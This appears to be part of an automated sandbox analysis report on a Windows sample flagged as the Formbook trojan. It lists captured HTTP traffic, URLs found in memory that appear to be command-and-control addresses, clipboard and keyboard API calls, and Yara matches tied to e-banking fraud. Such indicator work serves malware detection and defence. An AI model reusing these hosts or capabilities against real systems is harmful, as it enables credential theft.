            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:52:30 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:52:33 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Aug 2024 11:52:35 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 02 Aug 2024 11:52:38 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 02 Aug 2024 11:52:44 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 02 Aug 2024 11:52:46 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 02 Aug 2024 11:52:49 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 02 Aug 2024 11:52:51 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 02 Aug 2024 11:54:10 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 02 Aug 2024 11:54:13 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 02 Aug 2024 11:54:15 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 02 Aug 2024 11:54:18 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 02 Aug 2024 11:54:27 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4581093569.000000000561F000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.b301.space
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.b301.space/
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4581093569.000000000561F000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.b301.space/fo8o/
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://yourmine.ru/i/parking/glob_parking.png
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://2domains.ru
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://2domains.ru/
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://code.jquery.com/jquery-3.7.1.min.js
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000004612000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004072000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000004612000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004072000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000003.2448054962.000000000767A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033;1Y
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand=
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://rakkoma.com/
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://reg.ru?target=_blank
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
            Source: netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000004C5A000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.00000000046BA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.empowermedeco.com/fo8o/?blWd=mxnR
            Source: netbtugc.exe, 00000004.00000002.4582252078.0000000005C20000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580387603.0000000004DEC000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.000000000484C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-55552418-3
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-MLXKCD66
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000042EE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4582252078.0000000005C20000.00000004.00000800.00020000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003D4E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.com/buy/domains/?query=www.b301.space&utm_source=www.b301.space&utm_medium=expired&u
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.com/domain/new/rereg_details?dname=www.b301.space&utm_source=www.b301.space&utm_medi
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.com/domain/prolong_period_anonymous?dname=www.b301.space&utm_source=www.b301.space&u
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.com/domain/service/domain-broker?dname=www.b301.space&utm_source=www.b301.space&utm_
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/vps/?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/vps/cloud/?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/web-tools/geoip?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/web-tools/myip?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/whois/?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/whois/check_site?utm_source=www.b301.space&utm_medium=expired&utm_campaign
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003D4E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.value-domain.com/
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.value-domain.com/modall.php
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0074EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, | 0_2_0074EAFF
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0074ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, | 0_2_0074ED6A
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0074EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, | 0_2_0074EAFF
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0073AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0073AA57
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00769576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00769576

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.24d0000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.24d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.24d0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
